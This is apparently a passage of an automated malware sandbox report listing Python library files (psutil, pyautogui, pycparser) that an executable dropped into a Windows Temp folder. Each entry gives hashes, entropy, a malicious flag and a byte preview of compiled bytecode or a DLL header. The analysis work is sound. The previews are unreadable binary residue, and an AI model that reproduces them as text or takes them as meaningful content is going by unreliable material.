                                                                                                                                            Preview:...........e.K........................j.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.g.Z...e e.d...............Z!..e e.d...............Z"..e e.d...............Z#..e.j$......................Z%e.j&........Z&e.j'........e.j(........e.j)........e.j*........e.j+........e.j,........e.j-........e.j,........e.j.........e.j/........i.Z0e.j1........e.j2........e.j3........e.j4........e.j5........e.j6........e.j7........e.j8........e.j9........e.j:........e.j;........e.j<........e.j=........e.j>........e.j?........e.j@........e.jA........e.jB........e.jC........e.jD........e.jE........e.jF........e.jG........e.jH........i.ZI..eJd.d.d.d.d.d.d.d .!..............ZK..e.d"d#d$g...............ZLeLZM..e.d%g.d&................ZN..e.d'g.d(................ZOd)..ZPd*..ZQ

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\psutil\_psbsd.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38079
                                                                                                                                            Entropy (8bit):5.273862711195546
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:2KSpoUdkDZlKL7J9KFTIrKJDDWCY4WlhbXlweBhl0M9iYaSQ7P:2K2JktlQXKfJ2njXlwqr0M9iYapL
                                                                                                                                            MD5:B953B0AFD8A14490169D49EDBF22EAF5
                                                                                                                                            SHA1:FF83EEFAC70E3B49D3C007558142C1CB2112957E
                                                                                                                                            SHA-256:175E5FC4DE4232B003ABC8B7EEB400F21A0E54864D6B2589CF7D7A7AD55BAA71
                                                                                                                                            SHA-512:0D59624242BE026DA02075E52C3C2E8CF2BAB8F2659C6AA63646A4589750138244D27E901B22C68CFC47A1D7DCDC6C658D89F124427CC8D594441660DD1599ED
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..g.Z"e.rWe.j#........e.j$........e.j%........e.j&........e.j'........e.j(........e.j)........e.j*........e.j+........e.j,........e.j-........e.j.........e.j/........e.j0........i.Z1n.e.rWe.j#........e.j$........e.j'........e.j(........e.j)........e.j*........e.j2........e.j,........e.j+........e.j,........e.j%........e.j3........e.j4........e.j&........i.Z1nLe.rJe.j#........e.j$........e.j'........e.j(........e.j)........e.j*........e.j+........e.j,........e.j%........e.j3........e.j4........e.j&........i.Z1e.j5........e.j6........e.j7........e.j8........e.j9........e.j:........e.j;........e.j<........e.j=........e.j>........e.j?........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\psutil\_pslinux.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):105509
                                                                                                                                            Entropy (8bit):5.410896332585257
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:0cYwm6xe217pjv2WhDxnNB4dPnDkF/NB+KuHOZo4yFfORfZHbO:0iJF7pjeWhlN6dPnWI2oxfOG
                                                                                                                                            MD5:0018354559DA1AD5AF05F3F10BF9DA82
                                                                                                                                            SHA1:3D50B84542EA78BAD65DE9A7D44DE4D942F7BE78
                                                                                                                                            SHA-256:D6AB6EA80F56FE26A3D697D502163A5A1137341D4721E5BA8D28CEC5D438D452
                                                                                                                                            SHA-512:5993DC63DA735B77450BC3C70CB3D6A735557B4ECEAD32D160E7D4D8B89D0DEB2EB2A74EE91EE6831680A8C9754889764E873C2E3281626612E71092E3430AC7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e)a.............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d.l.m%Z%..d.d.l.m&Z&..d.d.l.m'Z'..d.d.l.m(Z(..d.d.l.m)Z)..d.d.l.m*Z*..d.d.l+m,Z,..d.d l+m-Z-..d.d!l+m.Z...d.d"l+m/Z/..d.d#l+m0Z0..d.d$l+m1Z1..e,r.d.d.l2Z2n.d.Z2g.d%..Z3d&Z4e.j5.........6....................d'..e.j7......................z.................Z8e.j5.........6....................d(..e.j7......................z.................Z9..e:e.d)..............Z;..e:e.d*..............Z<..e.j=........d+..............Z>..e.j?......................Z@d.aAe.jB........d,k.....ZCd-ZDe2..e.jE........ZFn(..e2jG........d.d/..eHe.jE......................i...............ZIeIjF........ZFe2..d.ZJd.ZKd0ZLd1ZMn5..G.d2..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\psutil\_psosx.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23363
                                                                                                                                            Entropy (8bit):5.19297284491773
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:uV4DrqtbKSVZlrrboIAcqKC8Mdqk9raSQNsSSSSSsU:um2t+qTorc1o9rapNsSSSSSX
                                                                                                                                            MD5:97BC0B6FD3B1304D60420B0B66116C55
                                                                                                                                            SHA1:3B7D14A305B17AA6FC20061EB6342F00FDB23940
                                                                                                                                            SHA-256:3C12B253F0C44139D86B23B5F0D957F4AA5E563ED393ABD0BAC80447D651039F
                                                                                                                                            SHA-512:41AD26EE5796CFC05A5948984B88C80473D20912B34F1B2E727422319CD5B953B1E17D682DF14BFFC72441EAA5F6051460464199655D54041D167D19437CEDCF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e|A........................J.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.Z...e.j.......................Z.e.j.........Z.e.j.........e.j.........e.j.........e.j ........e.j!........e.j"........e.j#........e.j$........e.j%........e.j&........e.j'........e.j(........e.j)........e.j*........e.j+........e.j,........e.j-........e.j.........e.j/........e.j0........e.j1........e.j2........e.j3........e.j4........i.Z5e.j6........e.j7........e.j8........e.j9........e.j:........e.j;........e.j<........e.j=........e.j>........e.j?........i.Z@..eAd.d.d.d.d.d.d.d.d.d.d.................ZB..eAd.d.d.d.d.d.d.d.................ZC..e.d.g.d ................ZD..e.d!g.d"................ZE..e.d#g.d$................ZF..e.d%eFjG........d&z.................ZHd'..ZId(..ZJd)..ZKd*..ZLd+..ZMd,..ZNd-..ZOd...ZPe.jQ........ZQe.jR

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\psutil\_psposix.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7460
                                                                                                                                            Entropy (8bit):5.671189528161568
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:YseLaC7nnNF5bRQA7IM5h3JXyfrd2E9My7yLqt:fWdRQA7j5hZ45l9Byut
                                                                                                                                            MD5:992B8EA64E41049607356AD264CA64C6
                                                                                                                                            SHA1:3DEF1C854B524FB3C419529CD47AEC8E8ED40E90
                                                                                                                                            SHA-256:717E0FA2F7A0EAB08CA81A2BAC23B2969BE1B03DF172029B7C0C8450741E7F67
                                                                                                                                            SHA-512:AA8568CC9F93365095A770CD66E1C653AF40730C1E9DFC59A044EA9EB1681C1181BE0B57E904D489ABFBAC8EFBEA47C471CD2F852E62A721B47D3094CCC13CBC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.!..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...e.r.d.d.l.Z.n.d.Z.g.d...Z.d...Z.e..9..e.e.d...............r-..e.j.........d...e.d...e.j.........D...........................................Z.d...Z.n.d...Z.d.d.e.j...........e e.d.e.j.......................e!e.j"........e.f.d...Z#d...Z$e.d.................Z%d.S.).z%Routines common to all posix systems......N.....)...MACOS....TimeoutExpired)...memoize)...sdiskusage)...usage_percent)...PY3)...ChildProcessError)...FileNotFoundError)...InterruptedError)...PermissionError)...ProcessLookupError)...unicode)..._psutil_osx)...pid_exists..wait_pid..disk_usage..get_terminal_mapc.....................|.....|.d.k.....r.d.S...t...........j.........|.d.................d.S.#.t...........$.r...Y.d.S.t...........$.r...Y.d.S.w.x.Y.w.).z6Check whether pid exists

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\psutil\_pssunos.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33204
                                                                                                                                            Entropy (8bit):5.258850965255194
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:puGSCeKkypLvuQC7A9E5GMLGkOv/Xddn9d+8pR:BL2QCkm8oGbHnN
                                                                                                                                            MD5:DA1C9756D8C9CBF659B7958E5044C7FD
                                                                                                                                            SHA1:C69918226382AA7B751E19D4B508F709FD6A6542
                                                                                                                                            SHA-256:268588920007EEAC512EE8FE9211B14B22C06516F81EAC95A7F98625271FA7A4
                                                                                                                                            SHA-512:75A6DFB8A80915C92DF8FF91CA453638ECBCCF7067B4DB9D2BD110E4BD046E4B9A680C84ADA4E319A92A4E3246B0AE15C33C43C74311CDE92AC81C08B3908C0F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.f........................<.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..g.d...Z"..e.j#......................Z$e.j%........Z%e.j&........d.k.....Z'd.Z(d.Z)e.j*........e.j+........e.j,........e.j-........e.j.........e.j/........e.j0........e.j1........e.j2........e.j3........e.j4........e.j-........e.j5........e.j6........i.Z7e.j8........e.j9........e.j:........e.j;........e.j<........e.j=........e.j>........e.j?........e.j@........e.jA........e.jB........e.jC........e.jD........e.jE........e.jF........e.jG........e.jH........e.jI........e.jJ........e.jK........e.jL........e.jM........e.jN........e.jO........e.jP........e(e.jQ........e)i.ZR..eSd.d.d.d.d d!d"d#d$d%d&d'.(..............ZT..e.d)g.d*..........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\psutil\_psutil_windows.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67072
                                                                                                                                            Entropy (8bit):5.905419806967227
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:BWseNxkc7Xva0Y420G1UD+dS4QBeLmRy:BWkcbi0Y42bUD+dS44eiRy
                                                                                                                                            MD5:3CBA71B6BC59C26518DC865241ADD80A
                                                                                                                                            SHA1:7E9C609790B1DE110328BBBCBB4CD09B7150E5BD
                                                                                                                                            SHA-256:E10B73D6E13A5AE2624630F3D8535C5091EF403DB6A00A2798F30874938EE996
                                                                                                                                            SHA-512:3EF7E20E382D51D93C707BE930E12781636433650D0A2C27E109EBEBEBA1F30EA3E7B09AF985F87F67F6B9D2AC6A7A717435F94B9D1585A9EB093A83771B43F2
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`T..$5..$5..$5..-M3..5..v@..&5..v@..(5..v@..,5..v@.. 5...k..&5..oM..55..$5...5...@..45...@..%5...@_.%5...@..%5..Rich$5..........................PE..d.....e.........." .........h..............................................@............`.........................................P...`.......@.... .......................0..(.......................................8............................................text............................... ..`.rdata..|I.......J..................@..@.data...x...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..(....0......................@..B................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\psutil\_pswindows.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49552
                                                                                                                                            Entropy (8bit):5.305423094101749
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:9mFq5Q+1RktUBmmQ7fDy6s+aij2yYv1jWBULHDsB9UNTkRwY:9siQ+jvJY2+aij2y7SDsBTn
                                                                                                                                            MD5:50A131DFAE46D49EDBCADF7074BF118D
                                                                                                                                            SHA1:AA6C15BEF8B93DAA6998EC3BE24EC14BA23B3C8A
                                                                                                                                            SHA-256:10DD4FE1BC1F77BE6DB923A35240AD1288ED85425FF51D910C43259EB1892403
                                                                                                                                            SHA-512:D1E1E8D1C42C0DB87807C72864267F07049F81F08A3FB4392CBA548B058EBF1E1B43FF9897CCCB2E4B7368B18A9DFA1A4356F74BA7DF1D9034425421A7A04DA1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d.l.m%Z%....d.d.l.m.Z&..nn#.e'$.rfZ(..e)e(...............*...................................+....................d...............r0..e.j,......................d...........d k.....r.d!Z-e-d"z...Z-e-d#z...Z-..e.e-..................d.Z([(w.w.x.Y.w.e.r.d.d.l/Z/n.d.Z/g.d$..Z0d%Z1d&Z2d'e.j3........v.Z4e/..d(Z5n...e/j6........d)d*d(i...............Z7e7j5........Z5e&j8........e.j9........e&j:........e.j;........e&j<........e.j=........e&j>........e.j?........e&j@........e.jA........e&jB........e.jC........e&jD........e.jE........e&jF........e.jG........e&jH........e.jI........e&jJ........e.jK..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pyautogui\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):85603
                                                                                                                                            Entropy (8bit):5.572144813966963
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:dTPRUfdd/9dlmGr6KMxYcIBbPhzojIUIFLBrrHOMXbPtdiOWBYoooEpoooXdy:wddlri09HOM3Wpy
                                                                                                                                            MD5:4BB9F09B349DA183BE523B824C164A68
                                                                                                                                            SHA1:5863818D220E97F7F8A976EA9E952FD2067383D6
                                                                                                                                            SHA-256:802A8A271ECDEF8321B4DF809FE63642E0BCFE3B204A1DC48161782189BF5B50
                                                                                                                                            SHA-512:728E6D4C104B7BF29EF8FD9FA50F8DACDB9B85660A6121FB851EA370582A7BDE2ED9419A3421356515EA20DB6C8591182F95D5AD41ED74605FAFC7E9218B8486
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e>>........................d.....d.d.l.m.Z.m.Z.m.Z...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z.e.j.........d...........d.k.....s.e.j.........d.d.............d.v.r.d.d.l.m.Z...n.d.d.l.m.Z.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3m4Z4..nJ#.e5$.rB..d...Z6e6Z.e6Z.e6Z.e6Z.e6Z.e6Z.e6Z.e6Z.e6Z.e6Z e6Z!e6Z"e6Z#e6Z$e6Z%e6Z&e6Z'e6Z(e6Z)e6Z*e6Z+e6Z,e6Z-e6Z.e6Z/e6Z0e6Z1e6Z2e6Z3e6Z4Y.n.w.x.Y.w...d.d.l7m8Z8m9Z9m:Z:m;Z;..n.#.e5$.r...d...Z<e<x.Z8x.Z9x.Z:Z;Y.n.w.x.Y.w.d...Z=..d.d.l>Z>d.d.l>m?Z?m@Z@mAZAmBZB..e=d.................ZCe>jC........jD........eC_D........e=d.................ZEe>jE........jD........eE_D........e=d.................ZFe>jF........jD........eF_D........e=d.................ZGe>jG........jD........eG_D........e=d.................ZHe>jH........jD........eH_D........e=d...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pyautogui\_pyautogui_osx.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16600
                                                                                                                                            Entropy (8bit):5.462251333400623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:UEpJgMGKony4FzqBd2fkbaramv9OP3Pf5RdS3IE:UUoKonyiqCfkmv9m/f5qIE
                                                                                                                                            MD5:000AB2FCCC82EA20F403230BC568181D
                                                                                                                                            SHA1:B19697B57BD1F727C5905AF77B6AA862CC763F86
                                                                                                                                            SHA-256:7D81A1A31FF8F442255F973FCCCCD82DC90916DA01C568206C580FADAD535B9F
                                                                                                                                            SHA-512:E59C2CCC9B116AB5BE49D99C9DA01D9B37D64B84DDCB4775D6F7BB25CC39AC005F256E8B4E2BA58E46EA4D133E8E0953B33A31FD89098897A6B63BBF1FED2DFD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........et=........................>.....d.d.l.Z.d.d.l.Z...d.d.l.Z.n.#...J.d.................x.Y.w.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...e.j.........d.k.....r...e.d.....................e.d...e.j.........D.............................Z.e.......................i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..i.d)d*..d+d*..d,d-..d.d-..d/d0..d1d0..d2d3..d4d3..d5d6..d7d6..d8d9..d:d9..d;d<..d=d<..d>d?..d@d?..dAdB....i.dCdB..dDdE..dFdE..dGdH..dIdH..dJdK..dLdK..dMdN..dOdN..dPdQ..dRdS..dTdU..dVdU..dWdX..dYdZ..d[d\..d]d^....i.d_d`..dad`..dbdc..ddde..dfde..dgdh..didh..djdk..dldk..dmdn..dodn..dpdq..drds..dtdu..dvdu..dwdx..dydx....i.dzd{..d|d{..d}d~..d.d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pyautogui\_pyautogui_win.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19264
                                                                                                                                            Entropy (8bit):5.7241539690374665
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:PMLv1OKfGP7rNh8TNl4Yr+HlP5rWlsygZamub:PM8cG7G0tRZamub
                                                                                                                                            MD5:2122D03277C7B5F8FDEC284425125E11
                                                                                                                                            SHA1:270ADEA78E2F0025025673963650F25A5490B50F
                                                                                                                                            SHA-256:E46D91022BCAB6022B5838961828FD0FC960DFCAC5B4AEDE02615AECAD8ED69D
                                                                                                                                            SHA-512:F9D22FC540711456054F6E76DB1122F3F65E1DD8B58A196FB3FB9ECF2A68C200AB48A49FBD5E18FEBC9FE1B1D910C6E1A8238F83CE4D8B263873ED0463AA0A17
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.Q..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.e.j.........d.k.....r...e.d...................e.j.........j...............................................n.#.e.$.r...Y.n.w.x.Y.w...d.Z.d.Z.d.Z.e.e.z...Z.d.Z.d.Z.e.e.z...Z.d.Z.d.Z.e.e.z...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...G.d...d.e.j.......................Z...G.d...d.e.j.......................Z ..G.d...d.e.j.......................Z!..G.d...d.e.j.......................Z"....e#d...e.j$........D.............................Z%e%.&....................i.d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d"..d$d"..d%d...d&d'..d(d)..d*d+..d,d-..d.d/..d0d/..d1d/..i.d2d3..d4d5..d6d7..d8d7..d9d:..d;d:..d<d=..d>d?..d@dA..dBdC..dDd...dEd...dFdG..dHdI..dJdG..dKdI..dLdM....i.dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\d]..d^d_..d`d_..dad_..dbd_..dcdd..dedf..dgdf..dhdi..djd.....i.dkd...dldm..dndo..dpdq..drds..dtdu..dvdw..dxdy..dzd{..d|d}..d~d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pyautogui\_pyautogui_x11.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26475
                                                                                                                                            Entropy (8bit):4.687998372432389
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:RHKTAJelJrGtOf4CYJ++lwjw208PrjzY/wI/Odfy8mljYIk75vXis:xir6fDJGvrzI+y8ijY71l
                                                                                                                                            MD5:AD69E7E934BE6765B618BE0B9B0994B2
                                                                                                                                            SHA1:F07AF3F33D3E6FFC1C3CAF676852ABAEED64FBF8
                                                                                                                                            SHA-256:0C0507D9F6A1E9AA5B0060E9F8F7126437926F5056CCEB5ADC63943DADF3C6A6
                                                                                                                                            SHA-512:098BCF55501846FAA93EBED22803CE161AC54DC756E6B20493554A91362649ABAC08C8654601AEE411D0557750ED94C510203F9B2989094663DA064E3E8BEB75
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eOA........................F.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.e.d.e.d.e.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.i.Z.e.j.........d.v.r...e.d...................d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d...Z.d.a.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z...e.e.j.........d.........................Z.....e d...e.j!........D.............................Z"e".#....................i.d.e..$....................e.j%.........&....................d...............................d.e..$....................e.j%.........&....................d...............................d e..$....................e.j%.........&....................d!..............................d"e..$....................e.j%.........&....................d#..............................d$e..$....................e.j%.........&....................d#..............................d%e..$....................e.j%.........&....................d&..............................d'e..$..........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pycparser\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3350
                                                                                                                                            Entropy (8bit):5.404482957205738
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:pllPcE93ShCJ3y9UFt2byZtrBOjbOlddpKbF6Tjqy3YIr:plOhdGtojbWdPp7
                                                                                                                                            MD5:78DC602ACC696BEAF1A7DDB5046FF05C
                                                                                                                                            SHA1:50CA4E757987A79A71D4779385A05FD3D4523751
                                                                                                                                            SHA-256:FEE3BAA606BD19492F02E598F9274AC499E82D3064A1E8485D6D357457EDBEFF
                                                                                                                                            SHA-512:356EBE87C006AFA354097162FD9C0483D1FBB258A00FE46B88A37EFE6478335726853FD5C37112F7A546FC85ED1D64EBC78215FB69D6BACC401398C68AB6CDF4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.........-.ff.........................F.....g.d...Z.d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.....d.d...Z.d.S.).)...c_lexer..c_parser..c_astz.2.22.....N)...check_output.....)...CParser..cpp..c...........................|.g.}.t...........|.t.........................r.|.|.z...}.n.|.d.k.....r.|.|.g.z...}.|.|.g.z...}...t...........|.d.................}.n'#.t...........$.r.}.t...........d.d.|.z...z...................d.}.~.w.w.x.Y.w.|.S.).ae... Preprocess a file using cpp... filename:. Name of the file you want to preprocess... cpp_path:. cpp_args:. Refer to the documentation of parse_file for the meaning of these. arguments... When successful, returns the preprocessed file's contents.. Errors from cpp will be printed out.. r....T)...universal_newlineszAUnable to invoke 'cpp'. Make sure its path was passed correctly.z.Original error: %sN)...isinstance..listr......OSError..RuntimeError)...filename..cpp_path..cpp_args..p

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pycparser\_c_ast.cfg

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4255
                                                                                                                                            Entropy (8bit):4.887485362483552
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:B2l8Wb/X2zPH4IxoW3teTpxvaIBw7I6YcaIXV6i:BhWbuQQCvaILXi
                                                                                                                                            MD5:A9DFB94EF658EB1BC34061A388018F85
                                                                                                                                            SHA1:483DC203064C439E500CDDDE0F1D63AE310BF6F1
                                                                                                                                            SHA-256:95DE5ECC4F72CC82452150147F0EDECC94A5322E275CA342CDF9AA8CEC904CDA
                                                                                                                                            SHA-512:48C3FC03C017E0BA1F8A2ED594D78631A21929904DFC057DB2FA165604D99B8587FAAD2CC946F019883A203ED07EF4C635CBAE645C4024DC4C9FDEECE31B1B82
                                                                                                                                            Malicious:false
